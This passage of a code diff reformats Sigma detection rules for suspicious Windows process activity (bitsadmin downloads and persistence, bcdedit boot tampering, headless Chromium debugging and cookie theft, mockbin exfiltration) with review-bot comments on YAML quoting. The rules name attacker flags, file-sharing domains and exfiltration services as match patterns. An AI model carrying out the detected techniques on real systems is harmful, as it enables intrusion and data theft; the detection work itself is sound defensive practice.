https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/ author: Janantha Marasinghe (https://github.com/blueteam0ps) 
@@ -27,17 +23,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \auditpol.exe - - OriginalFileName: AUDITPOL.EXE + - NewProcessName|endswith: \auditpol.exe + - OriginalFileName: AUDITPOL.EXE selection_cli: - CommandLine|contains: - - disable - - clear - - remove - - restore + CommandLine|contains: + - disable # disables a specific audit policy + - clear # delete or clears audit policy + - remove # removes an audit policy + - restore # restores an audit policy condition: process_creation and (all of selection_*) falsepositives: - - Administrator or administrator scripts might leverage the flags mentioned in - the detection section. Either way, it should always be monitored + - Administrator or administrator scripts might leverage the flags mentioned in the detection section. Either way, it should always be monitored level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_bash_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_bash_command_execution.yml index f34368a68..718131b85 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bash_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bash_command_execution.yml @@ -1,9 +1,7 @@ title: Indirect Inline Command Execution Via Bash.EXE id: 5edc2273-c26f-406c-83f3-f4d948e740dd status: experimental -description: Detects execution of Microsoft bash launcher with the "-c" flag. This - can be used to potentially bypass defenses and execute Linux or Windows-based - binaries directly via bash +description: Detects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash references: - https://lolbas-project.github.io/lolbas/Binaries/Bash/ author: frack113 
@@ -20,12 +18,12 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: - - :\Windows\System32\bash.exe - - :\Windows\SysWOW64\bash.exe - - OriginalFileName: Bash.exe + - NewProcessName|endswith: + - :\Windows\System32\bash.exe + - :\Windows\SysWOW64\bash.exe + - OriginalFileName: Bash.exe selection_cli: - CommandLine|contains: ' -c ' + CommandLine|contains: ' -c ' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_bash_file_execution.yml b/sigma/builtin/process_creation/proc_creation_win_bash_file_execution.yml index 55f7b5287..e9b227775 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bash_file_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bash_file_execution.yml @@ -1,12 +1,10 @@ title: Indirect Command Execution From Script File Via Bash.EXE id: 2d22a514-e024-4428-9dba-41505bd63a5b related: - - id: 5edc2273-c26f-406c-83f3-f4d948e740dd - type: similar + - id: 5edc2273-c26f-406c-83f3-f4d948e740dd + type: similar status: experimental -description: Detects execution of Microsoft bash launcher without any flags to execute - the content of a bash script directly. This can be used to potentially bypass - defenses and execute Linux or Windows-based binaries directly via bash +description: Detects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash references: - https://lolbas-project.github.io/lolbas/Binaries/Bash/ - https://linux.die.net/man/1/bash 
@@ -24,20 +22,21 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|endswith: - - :\Windows\System32\bash.exe - - :\Windows\SysWOW64\bash.exe - - OriginalFileName: Bash.exe + - NewProcessName|endswith: + - :\Windows\System32\bash.exe + - :\Windows\SysWOW64\bash.exe + - OriginalFileName: Bash.exe filter_main_cli_flag: - CommandLine|contains: + CommandLine|contains: + # Note: we're not interested in flags being passed first - bash.exe - - bash - filter_main_no_cli: - CommandLine: null + CommandLine: filter_main_empty: - CommandLine: '' + CommandLine: '' filter_main_no_flag: - CommandLine: + CommandLine: - bash.exe - bash condition: process_creation and (selection and not 1 of filter_main_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml b/sigma/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml index 845ebee46..536e09493 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bcdedit_boot_conf_tamper.yml @@ -1,9 +1,7 @@ title: Boot Configuration Tampering Via Bcdedit.EXE id: 1444443e-6757-43e4-9ea4-c8fc705f79a2 status: stable -description: Detects the use of the bcdedit command to tamper with the boot configuration - data. This technique is often times used by malware or attackers as a destructive - way before launching ransomware. +description: Detects the use of the bcdedit command to tamper with the boot configuration data. This technique is often times used by malware or attackers as a destructive way before launching ransomware. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md - https://eqllib.readthedocs.io/en/latest/analytics/c4732632-9c1d-4980-9fa8-1d98c93f918e.html 
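Review bot: In `filter_main_no_cli` the new line `CommandLine:` drops the explicit `null` and leaves the key with no value, so the filter now reads like an accidentally blank entry rather than a deliberate "field is absent" match. Both forms load as YAML null, so the detection logic is presumably unchanged, but the explicit form documents the intent at a glance; I would keep `CommandLine: null` on the new side. The added `# Note: we're not interested in flags being passed first` sits inside the `contains` list of `filter_main_cli_flag`, where a reader may take it to describe the two values that follow rather than the filter as a whole; placing it on the line above `CommandLine|contains:` would read more clearly.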
@@ -21,17 +19,17 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bcdedit.exe - - OriginalFileName: bcdedit.exe + - NewProcessName|endswith: \bcdedit.exe + - OriginalFileName: bcdedit.exe selection_set: - CommandLine|contains: set + CommandLine|contains: set selection_cli: - - CommandLine|contains|all: - - bootstatuspolicy - - ignoreallfailures - - CommandLine|contains|all: - - recoveryenabled - - 'no' + - CommandLine|contains|all: + - bootstatuspolicy + - ignoreallfailures + - CommandLine|contains|all: + - recoveryenabled + - no condition: process_creation and (all of selection_*) fields: - SubjectUserName diff --git a/sigma/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml b/sigma/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml index 2bed132a9..53fe1bb59 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bcdedit_susp_execution.yml @@ -21,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bcdedit.exe - - OriginalFileName: bcdedit.exe + - NewProcessName|endswith: \bcdedit.exe + - OriginalFileName: bcdedit.exe selection_cli: - CommandLine|contains: + CommandLine|contains: - delete - deletevalue - import diff --git a/sigma/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml index ceb911775..18fc4152f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bginfo_suspicious_child_process.yml 
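Review bot: In `selection_cli` of the bcdedit boot-configuration rule the second `contains|all` value changes from `- 'no'` to `- no`, and a bare `no` is a boolean in YAML 1.1 loaders such as PyYAML, so tooling built on those parsers will see `false` instead of the string `no` that a `recoveryenabled no` command line actually contains. The original quoting looks deliberate for exactly that reason, and the other quoted values in this set of hunks (for example `'%COMSPEC%'`, `'http:'`) keep their quotes. Whether the consuming engine's own YAML parser treats `no` as a string I cannot tell from the diff, so keeping `- 'no'` is the safe, portable choice and costs nothing.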
@@ -1,11 +1,10 @@ title: Suspicious Child Process Of BgInfo.EXE id: 811f459f-9231-45d4-959a-0266c6311987 related: - - id: aaf46cdc-934e-4284-b329-34aa701e3771 - type: similar + - id: aaf46cdc-934e-4284-b329-34aa701e3771 + type: similar status: experimental -description: Detects suspicious child processes of "BgInfo.exe" which could be a sign - of potential abuse of the binary to proxy execution via external VBScript +description: Detects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/ - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ @@ -29,22 +28,22 @@ detection: - \bginfo.exe - \bginfo64.exe selection_child: - - NewProcessName|endswith: - - \calc.exe - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \notepad.exe - - \powershell.exe - - \pwsh.exe - - \wscript.exe - - NewProcessName|contains: - - \AppData\Local\ - - \AppData\Roaming\ - - :\Users\Public\ - - :\Temp\ - - :\Windows\Temp\ - - :\PerfLogs\ + - NewProcessName|endswith: + - \calc.exe + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \notepad.exe + - \powershell.exe + - \pwsh.exe + - \wscript.exe + - NewProcessName|contains: + - \AppData\Local\ + - \AppData\Roaming\ + - :\Users\Public\ + - :\Temp\ + - :\Windows\Temp\ + - :\PerfLogs\ condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml b/sigma/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml index 799ff6d9d..651979187 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bginfo_uncommon_child_process.yml 
@@ -1,11 +1,10 @@ title: Uncommon Child Process Of BgInfo.EXE id: aaf46cdc-934e-4284-b329-34aa701e3771 related: - - id: 811f459f-9231-45d4-959a-0266c6311987 - type: similar + - id: 811f459f-9231-45d4-959a-0266c6311987 + type: similar status: test -description: Detects uncommon child processes of "BgInfo.exe" which could be a sign - of potential abuse of the binary to proxy execution via external VBScript +description: Detects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript references: - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/ - https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/ diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download.yml index b951b99ab..2070769b5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download.yml @@ -23,16 +23,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_cmd: - CommandLine|contains: ' /transfer ' + CommandLine|contains: ' /transfer ' selection_cli_1: - CommandLine|contains: + CommandLine|contains: - ' /create ' - ' /addfile ' selection_cli_2: - CommandLine|contains: http + CommandLine|contains: http condition: process_creation and (selection_img and (selection_cmd or all of selection_cli_*)) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml index ef450a7af..c14fb7ff8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml 
+++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_direct_ip.yml @@ -1,11 +1,10 @@ title: Suspicious Download From Direct IP Via Bitsadmin id: 99c840f2-2012-46fd-9141-c761987550ef related: - - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 - type: similar + - id: 90f138c1-f578-4ac3-8c49-eecfd847c8b7 + type: similar status: test -description: Detects usage of bitsadmin downloading a file using an URL that contains - an IP +description: Detects usage of bitsadmin downloading a file using an URL that contains an IP references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 @@ -28,15 +27,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_extension: - CommandLine|contains: + CommandLine|contains: - ://1 - ://2 - ://3 @@ -47,7 +46,7 @@ detection: - ://8 - ://9 filter_seven_zip: - CommandLine|contains: ://7- + CommandLine|contains: ://7- # For https://7-zip.org/ condition: process_creation and (all of selection_* and not 1 of filter_*) fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml index 7c109485c..6a6ae4df1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml 
@@ -25,16 +25,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_domain: - CommandLine|contains: - - .githubusercontent.com + CommandLine|contains: + - .githubusercontent.com # Includes both gists and github repositories / Michael Haag (idea) - anonfiles.com - cdn.discordapp.com - cdn.discordapp.com/attachments/ diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml index c103d447c..320e6710b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_extensions.yml @@ -23,15 +23,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_extension: - CommandLine|contains: + CommandLine|contains: - .7z - .asax - .ashx diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml index 8cf9c8fde..6a291ea61 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_susp_targetfolder.yml 
@@ -1,8 +1,7 @@ title: File Download Via Bitsadmin To A Suspicious Target Folder id: 2ddef153-167b-4e89-86b6-757a9e65dcac status: experimental -description: Detects usage of bitsadmin downloading a file to a suspicious target - folder +description: Detects usage of bitsadmin downloading a file to a suspicious target folder references: - https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin - https://isc.sans.edu/diary/22264 @@ -25,15 +24,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_folder: - CommandLine|contains: + CommandLine|contains: - :\Perflogs - :\ProgramData\ - :\Temp\ diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml index 3d7b40e10..5303ad955 100644 --- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_download_uncommon_targetfolder.yml @@ -24,15 +24,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \bitsadmin.exe - - OriginalFileName: bitsadmin.exe + - NewProcessName|endswith: \bitsadmin.exe + - OriginalFileName: bitsadmin.exe selection_flags: - CommandLine|contains: + CommandLine|contains: - ' /transfer ' - ' /create ' - ' /addfile ' selection_folder: - CommandLine|contains: + CommandLine|contains: - '%AppData%' - '%temp%' - '%tmp%' diff --git a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml index 266aeb0e5..2dd67eaaa 100644 
--- a/sigma/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml +++ b/sigma/builtin/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml @@ -1,12 +1,7 @@ title: Monitoring For Persistence Via BITS id: b9cbbc17-d00d-4e3d-a827-b06d03d2380d status: test -description: BITS will allow you to schedule a command to execute after a successful - download to notify you that the job is finished. When the job runs on the system - the command specified in the BITS job will be executed. This can be abused by - actors to create a backdoor within the system and for persistence. It will be - chained in a BITS job to schedule the download of malware/additional binaries - and execute the program after being downloaded +description: BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded references: - https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html - http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html @@ -25,18 +20,18 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains|all: + CommandLine|contains|all: - bitsadmin - /SetNotifyCmdLine - CommandLine|contains: + CommandLine|contains: - '%COMSPEC%' - cmd.exe - regsvr32.exe selection_2: - CommandLine|contains|all: + CommandLine|contains|all: - bitsadmin - /Addfile - CommandLine|contains: + CommandLine|contains: - 'http:' - 'https:' - 'ftp:' 
diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml index 92e4b364b..a3238bf6a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_debugging.yml @@ -1,12 +1,10 @@ title: Potential Data Stealing Via Chromium Headless Debugging id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 related: - - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 - type: derived + - id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 + type: derived status: test -description: Detects chromium based browsers starting in headless and debugging mode - and pointing to a user profile. This could be a sign of data stealing or remote - control +description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control references: - https://github.com/defaultnamehere/cookie_crimes/ - https://mango.pdf.zone/stealing-chrome-cookies-without-a-password @@ -25,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: - - --remote-debugging- + CommandLine|contains|all: + - --remote-debugging- # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc - --user-data-dir - --headless condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml index 1cbd95e65..30d562632 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml 
@@ -1,8 +1,8 @@ title: Browser Execution In Headless Mode id: ef9dcfed-690c-4c5d-a9d1-482cd422225c related: - - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e - type: derived + - id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e + type: derived status: test description: Detects execution of Chromium based browser in headless mode references: @@ -21,8 +21,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: --headless - NewProcessName|endswith: + CommandLine|contains: --headless + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml index 731b4548d..259a63b3b 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml @@ -1,11 +1,10 @@ title: File Download with Headless Browser id: 0e8cfe08-02c9-4815-a2f8-0d157b7ed33e related: - - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c - type: derived + - id: ef9dcfed-690c-4c5d-a9d1-482cd422225c + type: derived status: test -description: Detects execution of chromium based browser in headless mode using the - "dump-dom" command line to download files +description: Detects execution of chromium based browser in headless mode using the "dump-dom" command line to download files references: - https://twitter.com/mrd0x/status/1478234484881436672?s=12 - https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html @@ -23,11 +22,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - --headless - dump-dom - http - NewProcessName|endswith: + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe 
diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml index b4d6b533a..4051656fa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_load_extension.yml @@ -1,11 +1,10 @@ title: Chromium Browser Instance Executed With Custom Extension id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 related: - - id: 27ba3207-dd30-4812-abbf-5d20c57d474e - type: similar + - id: 27ba3207-dd30-4812-abbf-5d20c57d474e + type: similar status: experimental -description: Detects a Chromium based browser process with the 'load-extension' flag - to start a instance with a custom extension +description: Detects a Chromium based browser process with the 'load-extension' flag to start a instance with a custom extension references: - https://redcanary.com/blog/chromeloader/ - https://emkc.org/s/RJjuLa @@ -24,8 +23,8 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: --load-extension= - NewProcessName|endswith: + CommandLine|contains: --load-extension= + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe @@ -33,7 +32,6 @@ detection: - \vivaldi.exe condition: process_creation and selection falsepositives: - - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this - alert + - Usage of Chrome Extensions in testing tools such as BurpSuite will trigger this alert level: medium ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml index 7240d01e5..304247d9f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_mockbin_abuse.yml 
@@ -1,9 +1,7 @@ title: Chromium Browser Headless Execution To Mockbin Like Site id: 1c526788-0abe-4713-862f-b520da5e5316 status: experimental -description: Detects the execution of a Chromium based browser process with the "headless" - flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate - data). +description: Detects the execution of a Chromium based browser process with the "headless" flag and a URL pointing to the mockbin.org service (which can be used to exfiltrate data). references: - https://www.zscaler.com/blogs/security-research/steal-it-campaign author: X__Junior (Nextron Systems) @@ -18,16 +16,16 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe - \opera.exe - \vivaldi.exe selection_headless: - CommandLine|contains: --headless + CommandLine|contains: --headless selection_url: - CommandLine|contains: + CommandLine|contains: - ://run.mocky - ://mockbin condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml index b1c079712..c7091b03f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_chromium_susp_load_extension.yml 
@@ -1,11 +1,10 @@ title: Suspicious Chromium Browser Instance Executed With Custom Extension id: 27ba3207-dd30-4812-abbf-5d20c57d474e related: - - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 - type: similar + - id: 88d6e60c-759d-4ac1-a447-c0f1466c2d21 + type: similar status: experimental -description: Detects a suspicious process spawning a Chromium based browser process - with the 'load-extension' flag to start an instance with a custom extension +description: Detects a suspicious process spawning a Chromium based browser process with the 'load-extension' flag to start an instance with a custom extension references: - https://redcanary.com/blog/chromeloader/ - https://emkc.org/s/RJjuLa @@ -24,7 +23,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: --load-extension= + CommandLine|contains: --load-extension= ParentProcessName|endswith: - \cmd.exe - \cscript.exe @@ -34,7 +33,7 @@ detection: - \regsvr32.exe - \rundll32.exe - \wscript.exe - NewProcessName|endswith: + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml index 130a6a474..38cfd10dc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_inline_file_download.yml 
@@ -1,10 +1,7 @@ title: File Download From Browser Process Via Inline URL id: 94771a71-ba41-4b6e-a757-b531372eaab6 status: test -description: Detects execution of a browser process with a URL argument pointing to - a file with a potentially interesting extension. This can be abused to download - arbitrary files or to hide from the user for example by launching the browser - in a minimized state. +description: Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state. references: - https://twitter.com/mrd0x/status/1478116126005641220 - https://lolbas-project.github.io/lolbas/Binaries/Msedge/ @@ -22,16 +19,16 @@ detection: EventID: 4688 Channel: Security selection_img: - NewProcessName|endswith: + NewProcessName|endswith: - \brave.exe - \chrome.exe - \msedge.exe - \opera.exe - \vivaldi.exe selection_http: - CommandLine|contains: http + CommandLine|contains: http selection_extensions: - CommandLine|endswith: + CommandLine|endswith: - .7z - .dat - .dll diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml index ca5300959..02dd69bad 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_remote_debugging.yml 
@@ -1,11 +1,10 @@ title: Browser Started with Remote Debugging id: b3d34dc5-2efd-4ae3-845f-8ec14921f449 related: - - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 - type: derived + - id: 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 + type: derived status: test -description: Detects browsers starting with the remote debugging flags. Which is a - technique often used to perform browser injection attacks +description: Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks references: - https://yoroi.company/wp-content/uploads/2022/05/EternityGroup_report_compressed.pdf - https://www.mdsec.co.uk/2022/10/analysing-lastpass-part-1/ @@ -25,10 +24,11 @@ detection: EventID: 4688 Channel: Security selection_chromium_based: - CommandLine|contains: ' --remote-debugging-' + # Covers: --remote-debugging-address, --remote-debugging-port, --remote-debugging-socket-name, --remote-debugging-pipe....etc + CommandLine|contains: ' --remote-debugging-' selection_firefox: - CommandLine|contains: ' -start-debugger-server' - NewProcessName|endswith: \firefox.exe + CommandLine|contains: ' -start-debugger-server' + NewProcessName|endswith: \firefox.exe condition: process_creation and (1 of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml b/sigma/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml index 8bffd8b70..a9cdd3ab4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_browsers_tor_execution.yml @@ -18,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - NewProcessName|endswith: + NewProcessName|endswith: - \tor.exe - \Tor Browser\Browser\firefox.exe condition: process_creation and selection 
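Review bot: The comment added above `CommandLine|contains: ' --remote-debugging-'` lists the flag variants but does not say why selection_chromium_based, unlike selection_firefox, carries no NewProcessName constraint, so a reader may take the missing image filter for an oversight. If the omission is intentional (presumably so that non-browser processes that honour these flags are also caught), extend the comment with `# Note: No NewProcessName filter on purpose, so non-browser hosts of these flags are also covered`; if it is not, add the browser image list used by the sibling rules. The enclosing detection block starts outside the hunk.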
diff --git a/sigma/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml b/sigma/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml index fce7ddb5d..c3288cce4 100644 --- a/sigma/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_calc_uncommon_exec.yml @@ -1,11 +1,8 @@ title: Suspicious Calculator Usage id: 737e618a-a410-49b5-bec3-9e55ff7fbc15 status: test -description: 'Detects suspicious use of ''calc.exe'' with command line parameters - or in a suspicious directory, which is likely caused by some PoC or detection - evasion. - - ' +description: | + Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion. references: - https://twitter.com/ItsReallyNick/status/1094080242686312448 author: Florian Roth (Nextron Systems) @@ -22,16 +19,15 @@ detection: EventID: 4688 Channel: Security selection_1: - CommandLine|contains: '\calc.exe ' + CommandLine|contains: '\calc.exe ' selection_2: - NewProcessName|endswith: \calc.exe + NewProcessName|endswith: \calc.exe filter_main_known_locations: - NewProcessName|contains: + NewProcessName|contains: - :\Windows\System32\ - :\Windows\SysWOW64\ - :\Windows\WinSxS\ - condition: process_creation and (selection_1 or ( selection_2 and not filter_main_known_locations - )) + condition: process_creation and (selection_1 or 